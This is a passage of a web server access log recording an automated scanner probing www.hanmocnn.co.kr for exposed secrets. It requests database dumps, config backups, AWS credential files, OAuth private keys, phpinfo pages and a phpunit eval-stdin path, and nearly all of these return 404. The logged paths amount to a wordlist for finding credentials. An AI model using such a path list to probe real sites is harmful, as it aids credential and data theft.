www.hanmocnn.co.kr "/wp-content/uploads/db.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/uploads/mysql.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backup/db.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backups/db.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/db_backup.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/uploads/db_backup.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backup/db_backup.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/fullbackup.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/fullwebsite.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/data.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backup/data.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/uploads/data.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backups/data.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backup/database.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backups/database.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/wordpress.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backups/wordpress.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/dbdump.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/uploads/dbdump.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backups/dbdump.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/backup/dbdump.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config-sample.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php.bak1" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.bak1" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.inc.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/connect.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/connection.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/conn.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/conn.asp.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/connection.asp.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.jsp.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.ini.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/config.inc.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/config_ucenter.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/config_global.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bitrix/php_interface/dbconn.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/uc_server/data/config.inc.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/data/config.inc.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/var/debug.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/content/debug.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/npm-debug.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/yarn-debug.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/firebase-debug.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.txt.gz" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.tar.gz" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.zip" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.sql.tar.gz" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.sql.zip" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/mysql_debug.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/root/.aws/credentials" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/secret_access_key.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/s3/config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/config.yaml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/secrets/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/secretsmanager/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.php.old" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.inc.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.json.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.js.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/settings.local.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.local.php_old" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.inc" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.properties" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/appsettings.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/connectionstrings.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/settings.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/settings.php.old" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/settings.php.save" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/config/parameters.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/composer.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/package.json" [Client 185.177.72.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.xml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug-output.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/php.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/scripts/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tmp/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/symfony/_profiler/phpinfo" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/webdav/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/php-information" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tools/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/start.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/run.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/startup.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cron.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws-credentials.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/configure.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/service.pwd" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/service.grp" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server.sh" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/configuration.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/etc/local.xml.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/database.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/mysql.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/site.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wordpress.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server-status/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server-info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app_dev.php/_profiler/open?file=app/config/parameters.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/oauth-private.key" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/oauth-public.key" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/logs/stack.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/debug.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bootstrap/app.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/auth.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/filesystems.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/queue.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/session.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/view.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/logging.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/broadcasting.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resources/views/errors/500.blade.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resources/views/errors/404.blade.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resources/views/welcome.blade.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_debugbar/open" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debugbar" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/xdebug.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/xdebug_info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/symfony/debug/debug.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/composer/installed.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/autoload.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/.env.example" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/artisan" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_socket.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/testdb.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/errors.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:16:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.old" [Client 